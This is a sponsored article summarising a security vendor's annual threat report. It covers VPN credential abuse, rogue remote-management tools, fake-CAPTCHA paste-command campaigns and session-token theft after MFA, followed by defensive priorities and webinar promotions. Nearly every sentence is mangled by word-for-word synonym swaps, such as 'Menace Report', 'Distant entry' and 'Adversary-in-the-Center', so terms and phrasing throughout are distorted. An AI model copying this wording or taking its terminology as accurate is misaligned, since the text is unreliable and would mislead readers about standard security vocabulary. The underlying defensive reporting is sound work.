Distant entry and trusted administrative instruments play a central position in how organizations function at the moment. In line with Blackpoint Cyber’s 2026 Annual Menace Report, they’re additionally more and more central to how intrusions start.
Knowledgeable by evaluation of 1000’s of safety investigations performed throughout the reporting interval, the report highlights a shift in attacker conduct. Slightly than relying totally on vulnerability exploitation, menace actors continuously gained entry through the use of legitimate credentials, authentic instruments, and routine user-driven actions.
The report examines these patterns, paperwork the place intrusion exercise was disrupted, and presents defensive priorities derived from analyzed incident response outcomes noticed all through 2025.
Further information and incident walkthroughs might be lined throughout an upcoming dwell webinar hosted by Blackpoint Cyber.
➡️ Register right here
Key Findings From the 2026 Annual Menace Report
Attackers Are Coming into By means of Professional Entry Paths
Throughout incidents analyzed within the report, attackers have been extra more likely to log in utilizing authentic entry than to use vulnerabilities as their major entry level.
SSL VPN abuse accounted for 32.8 % of all identifiable incidents, making it some of the widespread preliminary entry vectors. In lots of instances, menace actors authenticated utilizing legitimate however compromised credentials, leading to VPN periods that appeared authentic to safety controls.
As soon as entry was established, these periods typically supplied broad inside attain, permitting attackers to maneuver quickly towards high-value methods with out instantly triggering alerts.
Trusted IT Instruments Are Being Used Towards Organizations
The report additionally paperwork frequent abuse of authentic Distant Monitoring and Administration instruments as a technique of entry and persistence.
RMM abuse appeared in 30.3 % of identifiable incidents, with ScreenConnect current in additional than 70 % of rogue RMM instances. As a result of these instruments are generally used for traditional IT administration, unauthorized installations typically resembled anticipated exercise and have been tough to differentiate with out sturdy visibility.
The report notes that environments with a number of distant entry instruments in use have been extra more likely to see rogue cases mix in with present tooling.
Social Engineering, Not Exploits, Drove the Majority of Incidents
Whereas authentic entry paths enabled many intrusions, consumer interplay represented the most important driver of general incident quantity.
Faux CAPTCHA and ClickFix-style campaigns accounted for 57.5 % of all identifiable incidents, making them the commonest assault sample documented within the report.
Slightly than exploiting software program vulnerabilities, these campaigns relied on misleading prompts. Customers have been instructed to stick instructions into the Home windows Run dialog as a part of what seemed to be a routine verification step. Execution used built-in Home windows instruments, with out conventional malware downloads or exploit exercise.
Cloud Intrusions Centered on Session Reuse After MFA
Multi-factor authentication was enabled in lots of cloud environments related to investigated incidents, but account compromise nonetheless occurred.
Adversary-in-the-Center phishing accounted for roughly 16 % of cloud account disables documented within the report. In these eventualities, MFA functioned as designed. As a substitute of bypassing authentication, attackers captured authenticated session tokens issued after profitable MFA and reused them to entry cloud providers.
From the attitude of the cloud platform, this exercise aligned with a authentic authenticated session.
Lots of the assaults described above start with authentic entry. What occurs subsequent is the place actual harm happens.
In a latest investigation, our SOC recognized a brand new implant known as Roadk1ll, designed to pivot throughout methods utilizing WebSocket-based communication and preserve entry whereas mixing into community visitors.
Be part of Contained in the SOC Episode #002 to see how these assaults progress from preliminary entry to full atmosphere compromise.
Save your seat
What These Findings Imply for Safety Groups
Throughout industries, environments, and assault sorts, the report highlights a constant sample: many profitable intrusions relied on exercise that blended into regular operations.
Slightly than counting on novel exploits or superior malware, attackers abused on a regular basis workflows similar to distant logins, trusted instruments, and commonplace consumer actions. Primarily based on the assault chains analyzed, the report identifies a number of defensive priorities:
- Deal with distant entry as high-risk, high-impact exercise
- Keep an entire stock of authorized RMM instruments and take away unused or legacy brokers
- Prohibit unapproved software program installations and restrict execution from user-writable directories
- Apply Conditional Entry controls that consider gadget posture, location, and session danger
These patterns have been documented throughout continuously focused sectors, together with manufacturing, healthcare, MSPs, monetary providers, and building.
For groups fascinated by analyzing how these intrusion patterns unfold, Blackpoint Cyber will evaluate key findings, case examples, and defensive takeaways from the 2026 Annual Menace Report throughout an upcoming dwell webinar.
➡️ Register to obtain the 2026 Annual Menace Report
Sponsored and written by Blackpoint Cyber.
